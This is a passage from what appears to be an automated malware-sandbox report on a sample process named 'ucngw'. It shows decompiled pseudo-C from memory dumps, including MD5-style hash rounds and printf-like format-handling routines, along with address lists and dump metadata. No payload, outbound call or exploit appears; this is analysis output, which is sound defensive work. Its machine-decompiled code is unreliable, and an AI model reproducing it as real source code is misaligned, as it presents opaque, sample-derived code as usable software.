				_t657 = _t655 + (_t696 ^ _t366 ^ _t610) + 0xf6bb4b60 + _v44 + _t696;
				_t552 = _t696 ^ _t657;
				asm("ror ebx, 0x9");
				_t368 = _t366 + (_t552 ^ _t610) + 0xbebfbc70 + _v32 + _t657;
				asm("rol edx, 0x4");
				_t612 = _t610 + (_t552 ^ _t368) + 0x289b7ec6 + _v20 + _t368;
				_v76 = _t612;
				asm("rol esi, 0xb");
				_t698 = _t696 + (_t657 ^ _t368 ^ _t612) + 0xeaa127fa + _v72 + _t612;
				asm("rol edi, 0x10");
				_t659 = _t657 + (_t698 ^ _t368 ^ _t612) + 0xd4ef3085 + _v60 + _t698;
				_t557 = _t698 ^ _t659;
				asm("ror edx, 0x9");
				_t617 = (_t612 ^ _t557) + 0x4881d05 + _v48 + _t368 + _t659;
				asm("rol ecx, 0x4");
				_t561 = (_t557 ^ _t617) + _v36 + _v76 + 0xd9d4d039 + _t617;
				asm("rol esi, 0xb");
				_t700 = _t698 + (_t659 ^ _t617 ^ _t561) + 0xe6db99e5 + _v24 + _t561;
				asm("rol edi, 0x10");
				_t661 = _t659 + (_t700 ^ _t617 ^ _t561) + 0x1fa27cf8 + _v12 + _t700;
				asm("ror edx, 0x9");
				_t619 = _t617 + (_t700 ^ _t661 ^ _t561) + 0xc4ac5665 + _v64 + _t661;
				asm("rol ecx, 0x6");
				_t563 = _t561 + (( !_t700 | _t619) ^ _t661) + 0xf4292244 + _v72 + _t619;
				asm("rol esi, 0xa");
				_t702 = _t700 + (( !_t661 | _t563) ^ _t619) + 0x432aff97 + _v44 + _t563;
				asm("rol edi, 0xf");
				_t663 = _t661 + (( !_t619 | _t702) ^ _t563) + 0xab9423a7 + _v16 + _t702;
				asm("ror edx, 0xb");
				_t621 = _t619 + (( !_t563 | _t663) ^ _t702) + 0xfc93a039 + _v52 + _t663;
				asm("rol ecx, 0x6");
				_t565 = _t563 + (( !_t702 | _t621) ^ _t663) + 0x655b59c3 + _v24 + _t621;
				asm("rol esi, 0xa");
				_t704 = _t702 + (( !_t663 | _t565) ^ _t621) + 0x8f0ccc92 + _v60 + _t565;
				asm("rol edi, 0xf");
				_t665 = _t663 + (( !_t621 | _t704) ^ _t565) + 0xffeff47d + _v32 + _t704;
				asm("ror edx, 0xb");
				_t623 = _t621 + (( !_t565 | _t665) ^ _t704) + 0x85845dd1 + _v68 + _t665;
				asm("rol ecx, 0x6");
				_t567 = _t565 + (( !_t704 | _t623) ^ _t665) + 0x6fa87e4f + _v40 + _t623;
				asm("rol ebx, 0xa");
				_t371 = _t704 - 0x1d31920 + (( !_t665 | _t567) ^ _t623) + _v12 + _t567;
				asm("rol edi, 0xf");
				_t667 = _t665 + (( !_t623 | _t371) ^ _t567) + 0xa3014314 + _v48 + _t371;
				asm("ror edx, 0xb");
				_t625 = _t623 + (( !_t567 | _t667) ^ _t371) + 0x4e0811a1 + _v20 + _t667;
				_v76 = _t625;
				_t668 = _v80;
				asm("rol esi, 0x6");
				_t707 = _t567 - 0x8ac817e + (( !_t371 | _t625) ^ _t667) + _v56 + _t625;
				 *((intOrPtr*)(_t668 + 0x50)) =  *((intOrPtr*)(_t668 + 0x50)) + _t707;
				_t372 = _v76;
				asm("rol edx, 0xa");
				_t628 = _t371 - 0x42c50dcb + (( !_t667 | _t707) ^ _t625) + _v28 + _t707;
				asm("rol ecx, 0xf");
				_t570 = _t667 + 0x2ad7d2bb + (( !_t372 | _t628) ^ _t707) + _v64 + _t628;
				 *((intOrPtr*)(_t668 + 0x58)) =  *((intOrPtr*)(_t668 + 0x58)) + _t570;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t668 + 0x5c)) =  *((intOrPtr*)(_t668 + 0x5c)) + _t628;
				 *((intOrPtr*)(_t668 + 0x54)) = _t372 - 0x14792c6f + (( !_t707 | _t570) ^ _t628) + _v36 +  *((intOrPtr*)(_t668 + 0x54)) + _t570;
				return E00C51252(_t372, _v8 ^ _t712, _t668, (( !_t707 | _t570) ^ _t628) + _v36);
			}












































































































    0x00c61156
    0x00c6115d
    0x00c61164
    0x00c61168
    0x00c6116b
    0x00c61170
    0x00c61170
    0x00c61174
    0x00c61192
    0x00c61196
    0x00c61197
    0x00c6119c
    0x00c611a1
    0x00c611a6
    0x00c611c6
    0x00c611c9
    0x00c611db
    0x00c611e3
    0x00c611e6
    0x00c61207
    0x00c61210
    0x00c61223
    0x00c61226
    0x00c6123f
    0x00c61242
    0x00c61259
    0x00c6125c
    0x00c61277
    0x00c6127a
    0x00c61293
    0x00c61296
    0x00c612af
    0x00c612b2
    0x00c612c9
    0x00c612cc
    0x00c612e7
    0x00c612ea
    0x00c612ee
    0x00c61306
    0x00c61309
    0x00c6130d
    0x00c61325
    0x00c61328
    0x00c6132c
    0x00c61342
    0x00c61345
    0x00c61349
    0x00c6134c
    0x00c61368
    0x00c6136b
    0x00c61374
    0x00c6138a
    0x00c6138f
    0x00c61392
    0x00c613af
    0x00c613b2
    0x00c613c1
    0x00c613c6
    0x00c613dd
    0x00c613e2
    0x00c613f9
    0x00c613fe
    0x00c61415
    0x00c6141a
    0x00c61431
    0x00c61436
    0x00c6144d
    0x00c61452
    0x00c6146b
    0x00c61470
    0x00c61487
    0x00c6148c
    0x00c614a1
    0x00c614a6
    0x00c614aa
    0x00c614be
    0x00c614c3
    0x00c614d8
    0x00c614db
    0x00c614df
    0x00c614e8
    0x00c61506
    0x00c6150b
    0x00c6151a
    0x00c6151d
    0x00c6153d
    0x00c61542
    0x00c61555
    0x00c61558
    0x00c6156a
    0x00c6156d
    0x00c6157b
    0x00c6157e
    0x00c61592
    0x00c61595
    0x00c61597
    0x00c615a7
    0x00c615aa
    0x00c615bd
    0x00c615c0
    0x00c615ce
    0x00c615d1
    0x00c615e5
    0x00c615e8
    0x00c615ea
    0x00c615fc
    0x00c615ff
    0x00c61610
    0x00c61613
    0x00c61617
    0x00c61624
    0x00c61627
    0x00c6163e
    0x00c61646
    0x00c61648
    0x00c61657
    0x00c6165a
    0x00c61667
    0x00c6166a
    0x00c61678
    0x00c6167b
    0x00c6168f
    0x00c61692
    0x00c616a6
    0x00c616a9
    0x00c616bd
    0x00c616c0
    0x00c616d4
    0x00c616d7
    0x00c616eb
    0x00c616ee
    0x00c61702
    0x00c61705
    0x00c61719
    0x00c6171c
    0x00c61730
    0x00c61733
    0x00c61745
    0x00c6174a
    0x00c6175a
    0x00c61763
    0x00c6177b
    0x00c6177e
    0x00c61791
    0x00c61796
    0x00c617aa
    0x00c617ad
    0x00c617c7
    0x00c617ca
    0x00c617ce
    0x00c617da
    0x00c617df
    0x00c617e2
    0x00c617e6
    0x00c617f4
    0x00c617f9
    0x00c61800
    0x00c61813
    0x00c61816
    0x00c61818
    0x00c61824
    0x00c6182c
    0x00c6182f
    0x00c61842

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100039B3, Relevance: .2, Instructions: 237Crypto
    C-Code - Quality: 83%
    			E100039B3(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x1001d018; // 0x26c1db24
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E10004357(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E10001B26(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E10002E58(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E100045E3(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E10002E58(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E100044CD(_t135, _t125, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E10002E58(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E10004162(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E1000433F(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E10003F58(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E100042AC(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E10004320(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E10003EF5(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E100040CA(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}











































    0x100039b3
    0x100039bb
    0x100039c2
    0x100039c7
    0x100039c9
    0x100039cd
    0x100039d0
    0x100039d4
    0x100039d5
    0x100039d8
    0x10003a45
    0x10003a48
    0x10003a97
    0x10003a97
    0x10003a9a
    0x10003a06
    0x10003a08
    0x10003a0d
    0x10003a0f
    0x10003ab5
    0x10003ab8
    0x10003bfe
    0x10003c00
    0x10003c0f
    0x10003c0f
    0x10003abe
    0x10003ac3
    0x10003ac6
    0x10003ac9
    0x10003acd
    0x10003ad3
    0x10003ad4
    0x10003ad6
    0x10003b00
    0x10003b00
    0x10003b04
    0x10003b07
    0x10003b11
    0x10003b13
    0x10003b16
    0x10003b18
    0x10003b1e
    0x10003b1e
    0x10003b20
    0x10003b20
    0x10003b23
    0x10003b31
    0x10003b31
    0x10003b33
    0x10003b35
    0x10003b36
    0x10003b38
    0x10003b3e
    0x10003b40
    0x10003b41
    0x10003b46
    0x10003b49
    0x10003b57
    0x10003b57
    0x10003b59
    0x10003b59
    0x10003b64
    0x10003b66
    0x10003b6b
    0x10003b6b
    0x10003b6e
    0x10003b74
    0x10003b76
    0x10003b79
    0x10003b89
    0x10003b8e
    0x10003b8e
    0x10003ba3
    0x10003ba8
    0x10003bab
    0x10003bb0
    0x10003bb3
    0x10003bb5
    0x10003bb7
    0x10003bba
    0x10003bbd
    0x10003bca
    0x10003bcf
    0x10003bcf
    0x10003bbd
    0x10003bd6
    0x10003bdb
    0x10003bde
    0x10003be3
    0x10003be6
    0x10003be8
    0x10003bf5
    0x10003bfa
    0x10003be8
    0x00000000
    0x10003bfd
    0x10003b4d
    0x10003b4e
    0x10003b51
    0x00000000
    0x00000000
    0x10003b53
    0x00000000
    0x10003b53
    0x10003b3a
    0x10003b3c
    0x00000000
    0x00000000
    0x00000000
    0x10003b3c
    0x10003b27
    0x10003b28
    0x10003b2b
    0x00000000
    0x00000000
    0x10003b2d
    0x00000000
    0x10003b2d
    0x00000000
    0x10003b1a
    0x10003b0b
    0x10003b0c
    0x10003b0f
    0x00000000
    0x00000000
    0x00000000
    0x10003b0f
    0x10003ada
    0x10003add
    0x10003adf
    0x10003aea
    0x10003aec
    0x10003af4
    0x10003af6
    0x10003af8
    0x00000000
    0x00000000
    0x10003afa
    0x10003afe
    0x10003afe
    0x00000000
    0x10003afe
    0x10003aee
    0x10003ae3
    0x10003ae3
    0x10003ae4
    0x00000000
    0x10003ae4
    0x10003ae1
    0x00000000
    0x10003ae1
    0x10003a15
    0x00000000
    0x10003a15
    0x10003aa1
    0x10003aa1
    0x10003aa4
    0x10003a76
    0x10003a76
    0x10003a77
    0x10003a79
    0x10003a7b
    0x00000000
    0x10003a7b
    0x10003aa6
    0x10003aa9
    0x00000000
    0x00000000
    0x10003aaf
    0x10003a1e
    0x10003a1e
    0x00000000
    0x10003a1e
    0x10003a4a
    0x10003a8d
    0x00000000
    0x10003a8d
    0x10003a4c
    0x10003a4f
    0x10003a82
    0x10003a84
    0x00000000
    0x10003a84
    0x10003a51
    0x10003a54
    0x10003a72
    0x10003a72
    0x10003a72
    0x10003a72
    0x00000000
    0x10003a72
    0x10003a56
    0x10003a59
    0x10003a6b
    0x00000000
    0x10003a6b
    0x10003a5b
    0x10003a5e
    0x00000000
    0x00000000
    0x10003a62
    0x00000000
    0x10003a62
    0x100039da
    0x00000000
    0x00000000
    0x100039e0
    0x100039e2
    0x10003a22
    0x10003a22
    0x10003a25
    0x10003a3e
    0x00000000
    0x10003a3e
    0x10003a27
    0x10003a27
    0x10003a2a
    0x00000000
    0x00000000
    0x10003a2d
    0x10003a30
    0x00000000
    0x00000000
    0x10003a32
    0x10003a35
    0x00000000
    0x10003a35
    0x100039e4
    0x10003a1c
    0x00000000
    0x10003a1c
    0x100039e8
    0x00000000
    0x00000000
    0x100039f1
    0x00000000
    0x00000000
    0x100039f6
    0x00000000
    0x00000000
    0x100039fb
    0x00000000
    0x00000000
    0x10003a04
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10003C10, Relevance: .2, Instructions: 237Crypto
    C-Code - Quality: 83%
    			E10003C10(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x1001d018; // 0x26c1db24
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E10004357(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E10001B26(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E10002E89(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E10004670(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E10002E89(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E10004558(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E10002E89(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E10004162(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E1000433F(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E10003F58(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E100042AC(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E10004320(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E10003EF5(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E100040CA(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}











































    0x10003c10
    0x10003c18
    0x10003c1f
    0x10003c24
    0x10003c26
    0x10003c2a
    0x10003c2d
    0x10003c31
    0x10003c32
    0x10003c35
    0x10003ca2
    0x10003ca5
    0x10003cf4
    0x10003cf4
    0x10003cf7
    0x10003c63
    0x10003c65
    0x10003c6a
    0x10003c6c
    0x10003d12
    0x10003d15
    0x10003e5b
    0x10003e5d
    0x10003e6c
    0x10003e6c
    0x10003d1b
    0x10003d20
    0x10003d23
    0x10003d26
    0x10003d2a
    0x10003d30
    0x10003d31
    0x10003d33
    0x10003d5d
    0x10003d5d
    0x10003d61
    0x10003d64
    0x10003d6e
    0x10003d70
    0x10003d73
    0x10003d75
    0x10003d7b
    0x10003d7b
    0x10003d7d
    0x10003d7d
    0x10003d80
    0x10003d8e
    0x10003d8e
    0x10003d90
    0x10003d92
    0x10003d93
    0x10003d95
    0x10003d9b
    0x10003d9d
    0x10003d9e
    0x10003da3
    0x10003da6
    0x10003db4
    0x10003db4
    0x10003db6
    0x10003db6
    0x10003dc1
    0x10003dc3
    0x10003dc8
    0x10003dc8
    0x10003dcb
    0x10003dd1
    0x10003dd3
    0x10003dd6
    0x10003de6
    0x10003deb
    0x10003deb
    0x10003e00
    0x10003e05
    0x10003e08
    0x10003e0d
    0x10003e10
    0x10003e12
    0x10003e14
    0x10003e17
    0x10003e1a
    0x10003e27
    0x10003e2c
    0x10003e2c
    0x10003e1a
    0x10003e33
    0x10003e38
    0x10003e3b
    0x10003e40
    0x10003e43
    0x10003e45
    0x10003e52
    0x10003e57
    0x10003e45
    0x00000000
    0x10003e5a
    0x10003daa
    0x10003dab
    0x10003dae
    0x00000000
    0x00000000
    0x10003db0
    0x00000000
    0x10003db0
    0x10003d97
    0x10003d99
    0x00000000
    0x00000000
    0x00000000
    0x10003d99
    0x10003d84
    0x10003d85
    0x10003d88
    0x00000000
    0x00000000
    0x10003d8a
    0x00000000
    0x10003d8a
    0x00000000
    0x10003d77
    0x10003d68
    0x10003d69
    0x10003d6c
    0x00000000
    0x00000000
    0x00000000
    0x10003d6c
    0x10003d37
    0x10003d3a
    0x10003d3c
    0x10003d47
    0x10003d49
    0x10003d51
    0x10003d53
    0x10003d55
    0x00000000
    0x00000000
    0x10003d57
    0x10003d5b
    0x10003d5b
    0x00000000
    0x10003d5b
    0x10003d4b
    0x10003d40
    0x10003d40
    0x10003d41
    0x00000000
    0x10003d41
    0x10003d3e
    0x00000000
    0x10003d3e
    0x10003c72
    0x00000000
    0x10003c72
    0x10003cfe
    0x10003cfe
    0x10003d01
    0x10003cd3
    0x10003cd3
    0x10003cd4
    0x10003cd6
    0x10003cd8
    0x00000000
    0x10003cd8
    0x10003d03
    0x10003d06
    0x00000000
    0x00000000
    0x10003d0c
    0x10003c7b
    0x10003c7b
    0x00000000
    0x10003c7b
    0x10003ca7
    0x10003cea
    0x00000000
    0x10003cea
    0x10003ca9
    0x10003cac
    0x10003cdf
    0x10003ce1
    0x00000000
    0x10003ce1
    0x10003cae
    0x10003cb1
    0x10003ccf
    0x10003ccf
    0x10003ccf
    0x10003ccf
    0x00000000
    0x10003ccf
    0x10003cb3
    0x10003cb6
    0x10003cc8
    0x00000000
    0x10003cc8
    0x10003cb8
    0x10003cbb
    0x00000000
    0x00000000
    0x10003cbf
    0x00000000
    0x10003cbf
    0x10003c37
    0x00000000
    0x00000000
    0x10003c3d
    0x10003c3f
    0x10003c7f
    0x10003c7f
    0x10003c82
    0x10003c9b
    0x00000000
    0x10003c9b
    0x10003c84
    0x10003c84
    0x10003c87
    0x00000000
    0x00000000
    0x10003c8a
    0x10003c8d
    0x00000000
    0x00000000
    0x10003c8f
    0x10003c92
    0x00000000
    0x10003c92
    0x10003c41
    0x10003c79
    0x00000000
    0x10003c79
    0x10003c45
    0x00000000
    0x00000000
    0x10003c4e
    0x00000000
    0x00000000
    0x10003c53
    0x00000000
    0x00000000
    0x10003c58
    0x00000000
    0x00000000
    0x10003c61
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
